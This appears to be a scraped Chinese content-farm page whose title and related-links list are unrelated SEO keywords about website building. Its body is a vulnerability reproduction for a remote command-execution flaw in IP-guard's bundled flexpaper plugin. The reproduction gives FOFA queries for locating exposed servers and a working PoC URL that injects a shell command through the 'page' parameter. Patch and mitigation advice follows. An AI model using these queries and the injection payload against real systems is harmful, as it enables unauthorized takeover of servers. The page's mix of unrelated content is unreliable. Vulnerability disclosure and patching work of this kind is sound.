当前位置: 首页 > news >正文

网站建设 南京网页微信版传输文件

网站建设 南京,网页微信版传输文件,搭建企业网站的步骤,清河县做网站简介 IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏…

简介

IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。

影响版本:IP-guard<4.81.0307.0

漏洞复现

FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"

访问页面如下所示:

POC:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL进行get请求:

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

从浏览器访问后会直接下载一个文件证明请求成功

访问POC:/ipg/static/appr/lib/flexpaper/php/test.txt

成功执行写入的命令

攻击者可以利用漏洞获取对服务器的控制权

修复建议

1、产品升级方案
官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.81.0307.0及以上。
2、临时缓解措施

  1. 配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。
  2. 如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.yayakq.cn/news/945515/

相关文章:

  • 中国搜索提交网站小区网站建设方案怎么写
  • iis 没有右键网站属性智通人才招聘网东莞
  • 百度商桥在网站搜索排行榜
  • 网站mip怎么做帝国cms手机网站
  • 手机网站开发要哪些人上海市工程建设协会网站
  • 网站建设人力资源分配做网站设计师的原因
  • 网站建设公司内幕湖南省博物馆网站建设
  • 在溧水做新店推广那家网站好网站建设属于什么类目
  • 爱站工具包石狮网页设计
  • 网站轮播广告数据分析师要学什么课程
  • 创建微网站网页版梦幻西游手游官网
  • 施工建设集团网站seo下载站
  • 长沙 网站设计 公司价格wordpress 4.3.1 下载
  • 手机网站域名开头站长统计工具
  • 杭州企业建设网站企业局域网视频网站开发
  • 邯郸网站优化公司兰州微网站建设
  • 张家界市建设工程造价管理站网站广西自治区住房城乡建设部网站
  • 企业网站 程序大望路网站建设公司
  • 深圳网络营销网站推广方法如何做网站 做论坛
  • 定制网站建设和运营网站后台编辑器不能正常显示
  • dede中英文网站 视频中建八局第一建设有限公司设计院
  • 网站怎么做图片搜索汉中市建设工程审批
  • 亚马逊欧洲站vs2015做网站如何添加控件
  • 购物网站模版aspnet网站开发到部署流程
  • 常州网站建设制作工作室石狮新站seo
  • 网站开发需要什么技能模板算量
  • 有网站前端如何做后台网站后台管理系统软件
  • 做赌场网站代理盗版小说网站怎么做的
  • 中国诚信建设网站网站运营维护措施有哪些
  • 体育局网站建设网站屏蔽中国ip